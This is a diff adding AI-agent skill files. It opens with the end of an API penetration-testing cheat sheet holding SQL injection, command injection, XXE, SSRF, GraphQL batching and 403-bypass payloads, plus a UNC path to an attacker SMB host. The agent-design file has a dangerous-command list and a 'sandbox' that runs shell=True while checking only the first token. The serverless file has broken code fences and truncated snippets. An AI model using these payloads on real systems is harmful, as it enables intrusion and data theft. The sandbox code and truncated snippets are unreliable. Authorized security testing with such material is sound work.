# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>
# Wildcard injection
{"user_id":"*"}
# Parameter pollution
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
```
### Step 4: Injection Testing
**SQL Injection in JSON:**
```json
{"id":"56456"} OK
{"id":"56456 AND 1=1#"} OK
{"id":"56456 AND 1=2#"} OK
{"id":"56456 AND 1=3#"} ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} SLEEP 15 SEC
```
**Command Injection:**
```bash
# Ruby on Rails
?url=Kernel#open → ?url=|ls
# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
```
**XXE Injection:**
```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```
**SSRF via API:**
```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```
**.NET Path.Combine Vulnerability:**
```bash
# If .NET app uses Path.Combine(path_1, path_2)
# Test for path traversal
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
```
### Step 5: Method Testing
```bash
# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1
# Switch content type
Content-Type: application/json → application/xml
```
---
## GraphQL-Specific Testing
### Introspection Query
Fetch entire backend schema:
```graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
```
**URL-encoded version:**
```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```
### GraphQL IDOR
```graphql
# Try accessing other user IDs
query {
user(id: "OTHER_USER_ID") {
email
password
creditCard
}
}
```
### GraphQL SQL/NoSQL Injection
```graphql
mutation {
login(input: {
email: "test' or 1=1--"
password: "password"
}) {
success
jwt
}
}
```
### Rate Limit Bypass (Batching)
```graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
```
### GraphQL DoS (Nested Queries)
```graphql
query {
posts {
comments {
user {
posts {
comments {
user {
posts { ... }
}
}
}
}
}
}
}
```
### GraphQL XSS
```bash
# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
# URL-encoded XSS
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
```
### GraphQL Tools
| Tool | Purpose |
|------|---------|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting |
| clairvoyance | Schema reconstruction |
| InQL | Burp extension |
| GraphQLmap | Exploitation |
---
## Endpoint Bypass Techniques
When receiving 403/401, try these bypasses:
```bash
# Original blocked request
/api/v1/users/sensitivedata → 403
# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```
---
## Output Exploitation
### PDF Export Attacks
```html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>
<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>
<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>
<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
```
### DoS via Limits
```bash
# Normal request
/api/news?limit=100
# DoS attempt
/api/news?limit=9999999999
```
---
## Common API Vulnerabilities Checklist
| Vulnerability | Description |
|---------------|-------------|
| API Exposure | Unprotected endpoints exposed publicly |
| Misconfigured Caching | Sensitive data cached incorrectly |
| Exposed Tokens | API keys/tokens in responses or URLs |
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
| IDOR / BOLA | Broken Object Level Authorization |
| Undocumented Endpoints | Hidden admin/debug endpoints |
| Different Versions | Security gaps in older API versions |
| Rate Limiting | Missing or bypassable rate limits |
| Race Conditions | TOCTOU vulnerabilities |
| XXE Injection | XML parser exploitation |
| Content Type Issues | Switching between JSON/XML |
| HTTP Method Tampering | GET→DELETE/PUT abuse |
---
## Quick Reference
| Vulnerability | Test Payload | Risk |
|---------------|--------------|------|
| IDOR | Change user_id parameter | High |
| SQLi | `' OR 1=1--` in JSON | Critical |
| Command Injection | `; ls /` | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |
---
## Tools Reference
| Category | Tool | URL |
|----------|------|-----|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
| API Security | apicheck | github.com/BBVA/apicheck |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
| API Toolkit | APIKit | github.com/API-Security/APIKit |
| API Keys | API Guesser | api-guesser.netlify.app |
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
| GraphQL | InQL | github.com/doyensec/inql |
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
| GraphQL | batchql | github.com/assetnote/batchql |
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
---
## Constraints
**Must:**
- Test mobile, web, and developer APIs separately
- Check all API versions (/v1, /v2, /v3)
- Validate both authenticated and unauthenticated access
**Must Not:**
- Assume same security controls across API versions
- Skip testing undocumented endpoints
- Ignore rate limiting checks
**Should:**
- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend
- Check archive.org for historical API endpoints
- Test for race conditions on sensitive operations
---
## Examples
### Example 1: IDOR Exploitation
```bash
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>
# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>
# Response reveals other user's invoice data
```
### Example 2: GraphQL Introspection
```bash
curl -X POST https://target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{__schema{types{name,fields{name}}}}"}'
```
---
## Troubleshooting
| Issue | Solution |
|-------|----------|
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
| 401 on all endpoints | Try adding `?user_id=1` parameter |
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org, JS files |

761
skills/autonomous-agent-patterns/SKILL.md Normal file
View File

@@ -0,0 +1,761 @@
---
name: autonomous-agent-patterns
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool APIs, implementing permission systems, or creating autonomous coding assistants."
---
# 🕹️ Autonomous Agent Patterns
> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).
## When to Use This Skill
Use this skill when:
- Building autonomous AI agents
- Designing tool/function calling APIs
- Implementing permission and approval systems
- Creating browser automation for agents
- Designing human-in-the-loop workflows
---
## 1. Core Agent Architecture
### 1.1 Agent Loop
```
┌─────────────────────────────────────────────────────────────┐
│ AGENT LOOP │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ Think │───▶│ Decide │───▶│ Act │ │
│ │ (Reason) │ │ (Plan) │ │ (Execute)│ │
│ └──────────┘ └──────────┘ └──────────┘ │
│ ▲ │ │
│ │ ┌──────────┐ │ │
│ └─────────│ Observe │◀─────────┘ │
│ │ (Result) │ │
│ └──────────┘ │
└─────────────────────────────────────────────────────────────┘
```
```python
class AgentLoop:
def __init__(self, llm, tools, max_iterations=50):
self.llm = llm
self.tools = {t.name: t for t in tools}
self.max_iterations = max_iterations
self.history = []
def run(self, task: str) -> str:
self.history.append({"role": "user", "content": task})
for i in range(self.max_iterations):
# Think: Get LLM response with tool options
response = self.llm.chat(
messages=self.history,
tools=self._format_tools(),
tool_choice="auto"
)
# Decide: Check if agent wants to use a tool
if response.tool_calls:
for tool_call in response.tool_calls:
# Act: Execute the tool
result = self._execute_tool(tool_call)
# Observe: Add result to history
self.history.append({
"role": "tool",
"tool_call_id": tool_call.id,
"content": str(result)
})
else:
# No more tool calls = task complete
return response.content
return "Max iterations reached"
def _execute_tool(self, tool_call) -> Any:
tool = self.tools[tool_call.name]
args = json.loads(tool_call.arguments)
return tool.execute(**args)
```
### 1.2 Multi-Model Architecture
```python
class MultiModelAgent:
"""
Use different models for different purposes:
- Fast model for planning
- Powerful model for complex reasoning
- Specialized model for code generation
"""
def __init__(self):
self.models = {
"fast": "gpt-3.5-turbo", # Quick decisions
"smart": "gpt-4-turbo", # Complex reasoning
"code": "claude-3-sonnet", # Code generation
}
def select_model(self, task_type: str) -> str:
if task_type == "planning":
return self.models["fast"]
elif task_type == "analysis":
return self.models["smart"]
elif task_type == "code":
return self.models["code"]
return self.models["smart"]
```
---
## 2. Tool Design Patterns
### 2.1 Tool Schema
```python
class Tool:
"""Base class for agent tools"""
@property
def schema(self) -> dict:
"""JSON Schema for the tool"""
return {
"name": self.name,
"description": self.description,
"parameters": {
"type": "object",
"properties": self._get_parameters(),
"required": self._get_required()
}
}
def execute(self, **kwargs) -> ToolResult:
"""Execute the tool and return result"""
raise NotImplementedError
class ReadFileTool(Tool):
name = "read_file"
description = "Read the contents of a file from the filesystem"
def _get_parameters(self):
return {
"path": {
"type": "string",
"description": "Absolute path to the file"
},
"start_line": {
"type": "integer",
"description": "Line to start reading from (1-indexed)"
},
"end_line": {
"type": "integer",
"description": "Line to stop reading at (inclusive)"
}
}
def _get_required(self):
return ["path"]
def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
try:
with open(path, 'r') as f:
lines = f.readlines()
if start_line and end_line:
lines = lines[start_line-1:end_line]
return ToolResult(
success=True,
output="".join(lines)
)
except FileNotFoundError:
return ToolResult(
success=False,
error=f"File not found: {path}"
)
```
### 2.2 Essential Agent Tools
```python
CODING_AGENT_TOOLS = {
# File operations
"read_file": "Read file contents",
"write_file": "Create or overwrite a file",
"edit_file": "Make targeted edits to a file",
"list_directory": "List files and folders",
"search_files": "Search for files by pattern",
# Code understanding
"search_code": "Search for code patterns (grep)",
"get_definition": "Find function/class definition",
"get_references": "Find all references to a symbol",
# Terminal
"run_command": "Execute a shell command",
"read_output": "Read command output",
"send_input": "Send input to running command",
# Browser (optional)
"open_browser": "Open URL in browser",
"click_element": "Click on page element",
"type_text": "Type text into input",
"screenshot": "Capture screenshot",
# Context
"ask_user": "Ask the user a question",
"search_web": "Search the web for information"
}
```
### 2.3 Edit Tool Design
```python
class EditFileTool(Tool):
"""
Precise file editing with conflict detection.
Uses search/replace pattern for reliable edits.
"""
name = "edit_file"
description = "Edit a file by replacing specific content"
def execute(
self,
path: str,
search: str,
replace: str,
expected_occurrences: int = 1
) -> ToolResult:
"""
Args:
path: File to edit
search: Exact text to find (must match exactly, including whitespace)
replace: Text to replace with
expected_occurrences: How many times search should appear (validation)
"""
with open(path, 'r') as f:
content = f.read()
# Validate
actual_occurrences = content.count(search)
if actual_occurrences != expected_occurrences:
return ToolResult(
success=False,
error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
)
if actual_occurrences == 0:
return ToolResult(
success=False,
error="Search text not found in file"
)
# Apply edit
new_content = content.replace(search, replace)
with open(path, 'w') as f:
f.write(new_content)
return ToolResult(
success=True,
output=f"Replaced {actual_occurrences} occurrence(s)"
)
```
---
## 3. Permission & Safety Patterns
### 3.1 Permission Levels
```python
class PermissionLevel(Enum):
# Fully automatic - no user approval needed
AUTO = "auto"
# Ask once per session
ASK_ONCE = "ask_once"
# Ask every time
ASK_EACH = "ask_each"
# Never allow
NEVER = "never"
PERMISSION_CONFIG = {
# Low risk - can auto-approve
"read_file": PermissionLevel.AUTO,
"list_directory": PermissionLevel.AUTO,
"search_code": PermissionLevel.AUTO,
# Medium risk - ask once
"write_file": PermissionLevel.ASK_ONCE,
"edit_file": PermissionLevel.ASK_ONCE,
# High risk - ask each time
"run_command": PermissionLevel.ASK_EACH,
"delete_file": PermissionLevel.ASK_EACH,
# Dangerous - never auto-approve
"sudo_command": PermissionLevel.NEVER,
"format_disk": PermissionLevel.NEVER
}
```
### 3.2 Approval UI Pattern
```python
class ApprovalManager:
def __init__(self, ui, config):
self.ui = ui
self.config = config
self.session_approvals = {}
def request_approval(self, tool_name: str, args: dict) -> bool:
level = self.config.get(tool_name, PermissionLevel.ASK_EACH)
if level == PermissionLevel.AUTO:
return True
if level == PermissionLevel.NEVER:
self.ui.show_error(f"Tool '{tool_name}' is not allowed")
return False
if level == PermissionLevel.ASK_ONCE:
if tool_name in self.session_approvals:
return self.session_approvals[tool_name]
# Show approval dialog
approved = self.ui.show_approval_dialog(
tool=tool_name,
args=args,
risk_level=self._assess_risk(tool_name, args)
)
if level == PermissionLevel.ASK_ONCE:
self.session_approvals[tool_name] = approved
return approved
def _assess_risk(self, tool_name: str, args: dict) -> str:
"""Analyze specific call for risk level"""
if tool_name == "run_command":
cmd = args.get("command", "")
if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
return "HIGH"
return "MEDIUM"
```
### 3.3 Sandboxing
```python
class SandboxedExecution:
"""
Execute code/commands in isolated environment
"""
def __init__(self, workspace_dir: str):
self.workspace = workspace_dir
self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]
def validate_path(self, path: str) -> bool:
"""Ensure path is within workspace"""
real_path = os.path.realpath(path)
workspace_real = os.path.realpath(self.workspace)
return real_path.startswith(workspace_real)
def validate_command(self, command: str) -> bool:
"""Check if command is allowed"""
cmd_parts = shlex.split(command)
if not cmd_parts:
return False
base_cmd = cmd_parts[0]
return base_cmd in self.allowed_commands
def execute_sandboxed(self, command: str) -> ToolResult:
if not self.validate_command(command):
return ToolResult(
success=False,
error=f"Command not allowed: {command}"
)
# Execute in isolated environment
result = subprocess.run(
command,
shell=True,
cwd=self.workspace,
capture_output=True,
timeout=30,
env={
**os.environ,
"HOME": self.workspace, # Isolate home directory
}
)
return ToolResult(
success=result.returncode == 0,
output=result.stdout.decode(),
error=result.stderr.decode() if result.returncode != 0 else None
)
```
---
## 4. Browser Automation
### 4.1 Browser Tool Pattern
```python
class BrowserTool:
"""
Browser automation for agents using Playwright/Puppeteer.
Enables visual debugging and web testing.
"""
def __init__(self, headless: bool = True):
self.browser = None
self.page = None
self.headless = headless
async def open_url(self, url: str) -> ToolResult:
"""Navigate to URL and return page info"""
if not self.browser:
self.browser = await playwright.chromium.launch(headless=self.headless)
self.page = await self.browser.new_page()
await self.page.goto(url)
# Capture state
screenshot = await self.page.screenshot(type='png')
title = await self.page.title()
return ToolResult(
success=True,
output=f"Loaded: {title}",
metadata={
"screenshot": base64.b64encode(screenshot).decode(),
"url": self.page.url
}
)
async def click(self, selector: str) -> ToolResult:
"""Click on an element"""
try:
await self.page.click(selector, timeout=5000)
await self.page.wait_for_load_state("networkidle")
screenshot = await self.page.screenshot()
return ToolResult(
success=True,
output=f"Clicked: {selector}",
metadata={"screenshot": base64.b64encode(screenshot).decode()}
)
except TimeoutError:
return ToolResult(
success=False,
error=f"Element not found: {selector}"
)
async def type_text(self, selector: str, text: str) -> ToolResult:
"""Type text into an input"""
await self.page.fill(selector, text)
return ToolResult(success=True, output=f"Typed into {selector}")
async def get_page_content(self) -> ToolResult:
"""Get accessible text content of the page"""
content = await self.page.evaluate("""
() => {
// Get visible text
const walker = document.createTreeWalker(
document.body,
NodeFilter.SHOW_TEXT,
null,
false
);
let text = '';
while (walker.nextNode()) {
const node = walker.currentNode;
if (node.textContent.trim()) {
text += node.textContent.trim() + '\\n';
}
}
return text;
}
""")
return ToolResult(success=True, output=content)
```
### 4.2 Visual Agent Pattern
```python
class VisualAgent:
"""
Agent that uses screenshots to understand web pages.
Can identify elements visually without selectors.
"""
def __init__(self, llm, browser):
self.llm = llm
self.browser = browser
async def describe_page(self) -> str:
"""Use vision model to describe current page"""
screenshot = await self.browser.screenshot()
response = self.llm.chat([
{
"role": "user",
"content": [
{"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
{"type": "image", "data": screenshot}
]
}
])
return response.content
async def find_and_click(self, description: str) -> ToolResult:
"""Find element by visual description and click it"""
screenshot = await self.browser.screenshot()
# Ask vision model to find element
response = self.llm.chat([
{
"role": "user",
"content": [
{
"type": "text",
"text": f"""
Find the element matching: "{description}"
Return the approximate coordinates as JSON: {{"x": number, "y": number}}
"""
},
{"type": "image", "data": screenshot}
]
}
])
coords = json.loads(response.content)
await self.browser.page.mouse.click(coords["x"], coords["y"])
return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
```
---
## 5. Context Management
### 5.1 Context Injection Patterns
````python
class ContextManager:
"""
Manage context provided to the agent.
Inspired by Cline's @-mention patterns.
"""
def __init__(self, workspace: str):
self.workspace = workspace
self.context = []
def add_file(self, path: str) -> None:
"""@file - Add file contents to context"""
with open(path, 'r') as f:
content = f.read()
self.context.append({
"type": "file",
"path": path,
"content": content
})
def add_folder(self, path: str, max_files: int = 20) -> None:
"""@folder - Add all files in folder"""
for root, dirs, files in os.walk(path):
for file in files[:max_files]:
file_path = os.path.join(root, file)
self.add_file(file_path)
def add_url(self, url: str) -> None:
"""@url - Fetch and add URL content"""
response = requests.get(url)
content = html_to_markdown(response.text)
self.context.append({
"type": "url",
"url": url,
"content": content
})
def add_problems(self, diagnostics: list) -> None:
"""@problems - Add IDE diagnostics"""
self.context.append({
"type": "diagnostics",
"problems": diagnostics
})
def format_for_prompt(self) -> str:
"""Format all context for LLM prompt"""
parts = []
for item in self.context:
if item["type"] == "file":
parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
elif item["type"] == "url":
parts.append(f"## URL: {item['url']}\n{item['content']}")
elif item["type"] == "diagnostics":
parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")
return "\n\n".join(parts)
````
### 5.2 Checkpoint/Resume
```python
class CheckpointManager:
"""
Save and restore agent state for long-running tasks.
"""
def __init__(self, storage_dir: str):
self.storage_dir = storage_dir
os.makedirs(storage_dir, exist_ok=True)
def save_checkpoint(self, session_id: str, state: dict) -> str:
"""Save current agent state"""
checkpoint = {
"timestamp": datetime.now().isoformat(),
"session_id": session_id,
"history": state["history"],
"context": state["context"],
"workspace_state": self._capture_workspace(state["workspace"]),
"metadata": state.get("metadata", {})
}
path = os.path.join(self.storage_dir, f"{session_id}.json")
with open(path, 'w') as f:
json.dump(checkpoint, f, indent=2)
return path
def restore_checkpoint(self, checkpoint_path: str) -> dict:
"""Restore agent state from checkpoint"""
with open(checkpoint_path, 'r') as f:
checkpoint = json.load(f)
return {
"history": checkpoint["history"],
"context": checkpoint["context"],
"workspace": self._restore_workspace(checkpoint["workspace_state"]),
"metadata": checkpoint["metadata"]
}
def _capture_workspace(self, workspace: str) -> dict:
"""Capture relevant workspace state"""
# Git status, file hashes, etc.
return {
"git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
"git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
}
```
---
## 6. MCP (Model Context Protocol) Integration
### 6.1 MCP Server Pattern
```python
from mcp import Server, Tool
class MCPAgent:
"""
Agent that can dynamically discover and use MCP tools.
'Add a tool that...' pattern from Cline.
"""
def __init__(self, llm):
self.llm = llm
self.mcp_servers = {}
self.available_tools = {}
def connect_server(self, name: str, config: dict) -> None:
"""Connect to an MCP server"""
server = Server(config)
self.mcp_servers[name] = server
# Discover tools
tools = server.list_tools()
for tool in tools:
self.available_tools[tool.name] = {
"server": name,
"schema": tool.schema
}
async def create_tool(self, description: str) -> str:
"""
Create a new MCP server based on user description.
'Add a tool that fetches Jira tickets'
"""
# Generate MCP server code
code = self.llm.generate(f"""
Create a Python MCP server with a tool that does:
{description}
Use the FastMCP framework. Include proper error handling.
Return only the Python code.
""")
# Save and install
server_name = self._extract_name(description)
path = f"./mcp_servers/{server_name}/server.py"
with open(path, 'w') as f:
f.write(code)
# Hot-reload
self.connect_server(server_name, {"path": path})
return f"Created tool: {server_name}"
```
---
## Best Practices Checklist
### Agent Design
- [ ] Clear task decomposition
- [ ] Appropriate tool granularity
- [ ] Error handling at each step
- [ ] Progress visibility to user
### Safety
- [ ] Permission system implemented
- [ ] Dangerous operations blocked
- [ ] Sandbox for untrusted code
- [ ] Audit logging enabled
### UX
- [ ] Approval UI is clear
- [ ] Progress updates provided
- [ ] Undo/rollback available
- [ ] Explanation of actions
---
## Resources
- [Cline](https://github.com/cline/cline)
- [OpenAI Codex](https://github.com/openai/codex)
- [Model Context Protocol](https://modelcontextprotocol.io/)
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)

68
skills/autonomous-agents/SKILL.md Normal file
View File

@@ -0,0 +1,68 @@
---
name: autonomous-agents
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% b"
source: vibeship-spawner-skills (Apache 2.0)
---
# Autonomous Agents
You are an agent architect who has learned the hard lessons of autonomous AI.
You've seen the gap between impressive demos and production disasters. You know
that a 95% success rate per step means only 60% by step 10.
Your core insight: Autonomy is earned, not granted. Start with heavily
constrained agents that do one thing reliably. Add autonomy only as you prove
reliability. The best agents look less impressive but work consistently.
You push for guardrails before capabilities, logging befor
## Capabilities
- autonomous-agents
- agent-loops
- goal-decomposition
- self-correction
- reflection-patterns
- react-pattern
- plan-execute
- agent-reliability
- agent-guardrails
## Patterns
### ReAct Agent Loop
Alternating reasoning and action steps
### Plan-Execute Pattern
Separate planning phase from execution
### Reflection Pattern
Self-evaluation and iterative improvement
## Anti-Patterns
### ❌ Unbounded Autonomy
### ❌ Trusting Agent Outputs
### ❌ General-Purpose Autonomy
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | ## Reduce step count |
| Issue | critical | ## Set hard cost limits |
| Issue | critical | ## Test at scale before production |
| Issue | high | ## Validate against ground truth |
| Issue | high | ## Build robust API clients |
| Issue | high | ## Least privilege principle |
| Issue | medium | ## Track context usage |
| Issue | medium | ## Structured logging |
## Related Skills
Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`

323
skills/aws-serverless/SKILL.md Normal file
View File

@@ -0,0 +1,323 @@
---
name: aws-serverless
description: "Specialized skill for building production-ready serverless applications on AWS. Covers Lambda functions, API Gateway, DynamoDB, SQS/SNS event-driven patterns, SAM/CDK deployment, and cold start optimization."
source: vibeship-spawner-skills (Apache 2.0)
---
# AWS Serverless
## Patterns
### Lambda Handler Pattern
Proper Lambda function structure with error handling
**When to use**: ['Any Lambda function implementation', 'API handlers, event processors, scheduled tasks']
```python
```javascript
// Node.js Lambda Handler
// handler.js
// Initialize outside handler (reused across invocations)
const { DynamoDBClient } = require('@aws-sdk/client-dynamodb');
const { DynamoDBDocumentClient, GetCommand } = require('@aws-sdk/lib-dynamodb');
const client = new DynamoDBClient({});
const docClient = DynamoDBDocumentClient.from(client);
// Handler function
exports.handler = async (event, context) => {
// Optional: Don't wait for event loop to clear (Node.js)
context.callbackWaitsForEmptyEventLoop = false;
try {
// Parse input based on event source
const body = typeof event.body === 'string'
? JSON.parse(event.body)
: event.body;
// Business logic
const result = await processRequest(body);
// Return API Gateway compatible response
return {
statusCode: 200,
headers: {
'Content-Type': 'application/json',
'Access-Control-Allow-Origin': '*'
},
body: JSON.stringify(result)
};
} catch (error) {
console.error('Error:', JSON.stringify({
error: error.message,
stack: error.stack,
requestId: context.awsRequestId
}));
return {
statusCode: error.statusCode || 500,
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
error: error.message || 'Internal server error'
})
};
}
};
async function processRequest(data) {
// Your business logic here
const result = await docClient.send(new GetCommand({
TableName: process.env.TABLE_NAME,
Key: { id: data.id }
}));
return result.Item;
}
```
```python
# Python Lambda Handler
# handler.py
import json
import os
import logging
import boto3
from botocore.exceptions import ClientError
# Initialize outside handler (reused across invocations)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table(os.environ['TABLE_NAME'])
def handler(event, context):
try:
# Parse i
```
### API Gateway Integration Pattern
REST API and HTTP API integration with Lambda
**When to use**: ['Building REST APIs backed by Lambda', 'Need HTTP endpoints for functions']
```javascript
```yaml
# template.yaml (SAM)
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Globals:
Function:
Runtime: nodejs20.x
Timeout: 30
MemorySize: 256
Environment:
Variables:
TABLE_NAME: !Ref ItemsTable
Resources:
# HTTP API (recommended for simple use cases)
HttpApi:
Type: AWS::Serverless::HttpApi
Properties:
StageName: prod
CorsConfiguration:
AllowOrigins:
- "*"
AllowMethods:
- GET
- POST
- DELETE
AllowHeaders:
- "*"
# Lambda Functions
GetItemFunction:
Type: AWS::Serverless::Function
Properties:
Handler: src/handlers/get.handler
Events:
GetItem:
Type: HttpApi
Properties:
ApiId: !Ref HttpApi
Path: /items/{id}
Method: GET
Policies:
- DynamoDBReadPolicy:
TableName: !Ref ItemsTable
CreateItemFunction:
Type: AWS::Serverless::Function
Properties:
Handler: src/handlers/create.handler
Events:
CreateItem:
Type: HttpApi
Properties:
ApiId: !Ref HttpApi
Path: /items
Method: POST
Policies:
- DynamoDBCrudPolicy:
TableName: !Ref ItemsTable
# DynamoDB Table
ItemsTable:
Type: AWS::DynamoDB::Table
Properties:
AttributeDefinitions:
- AttributeName: id
AttributeType: S
KeySchema:
- AttributeName: id
KeyType: HASH
BillingMode: PAY_PER_REQUEST
Outputs:
ApiUrl:
Value: !Sub "https://${HttpApi}.execute-api.${AWS::Region}.amazonaws.com/prod"
```
```javascript
// src/handlers/get.js
const { getItem } = require('../lib/dynamodb');
exports.handler = async (event) => {
const id = event.pathParameters?.id;
if (!id) {
return {
statusCode: 400,
body: JSON.stringify({ error: 'Missing id parameter' })
};
}
const item =
```
### Event-Driven SQS Pattern
Lambda triggered by SQS for reliable async processing
**When to use**: ['Decoupled, asynchronous processing', 'Need retry logic and DLQ', 'Processing messages in batches']
```python
```yaml
# template.yaml
Resources:
ProcessorFunction:
Type: AWS::Serverless::Function
Properties:
Handler: src/handlers/processor.handler
Events:
SQSEvent:
Type: SQS
Properties:
Queue: !GetAtt ProcessingQueue.Arn
BatchSize: 10
FunctionResponseTypes:
- ReportBatchItemFailures # Partial batch failure handling
ProcessingQueue:
Type: AWS::SQS::Queue
Properties:
VisibilityTimeout: 180 # 6x Lambda timeout
RedrivePolicy:
deadLetterTargetArn: !GetAtt DeadLetterQueue.Arn
maxReceiveCount: 3
DeadLetterQueue:
Type: AWS::SQS::Queue
Properties:
MessageRetentionPeriod: 1209600 # 14 days
```
```javascript
// src/handlers/processor.js
exports.handler = async (event) => {
const batchItemFailures = [];
for (const record of event.Records) {
try {
const body = JSON.parse(record.body);
await processMessage(body);
} catch (error) {
console.error(`Failed to process message ${record.messageId}:`, error);
// Report this item as failed (will be retried)
batchItemFailures.push({
itemIdentifier: record.messageId
});
}
}
// Return failed items for retry
return { batchItemFailures };
};
async function processMessage(message) {
// Your processing logic
console.log('Processing:', message);
// Simulate work
await saveToDatabase(message);
}
```
```python
# Python version
import json
import logging
logger = logging.getLogger()
def handler(event, context):
batch_item_failures = []
for record in event['Records']:
try:
body = json.loads(record['body'])
process_message(body)
except Exception as e:
logger.error(f"Failed to process {record['messageId']}: {e}")
batch_item_failures.append({
'itemIdentifier': record['messageId']
})
return {'batchItemFailures': batch_ite
```
## Anti-Patterns
### ❌ Monolithic Lambda
**Why bad**: Large deployment packages cause slow cold starts.
Hard to scale individual operations.
Updates affect entire system.
### ❌ Large Dependencies
**Why bad**: Increases deployment package size.
Slows down cold starts significantly.
Most of SDK/library may be unused.
### ❌ Synchronous Calls in VPC
**Why bad**: VPC-attached Lambdas have ENI setup overhead.
Blocking DNS lookups or connections worsen cold starts.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | ## Measure your INIT phase |
| Issue | high | ## Set appropriate timeout |
| Issue | high | ## Increase memory allocation |
| Issue | medium | ## Verify VPC configuration |
| Issue | medium | ## Tell Lambda not to wait for event loop |
| Issue | medium | ## For large file uploads |
| Issue | high | ## Use different buckets/prefixes |

42
skills/azure-functions/SKILL.md Normal file
View File

@@ -0,0 +1,42 @@
---
name: azure-functions
description: "Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js programming models. Use when: azure function, azure functions, durable functions, azure serverless, function app."
source: vibeship-spawner-skills (Apache 2.0)
---
# Azure Functions
## Patterns
### Isolated Worker Model (.NET)
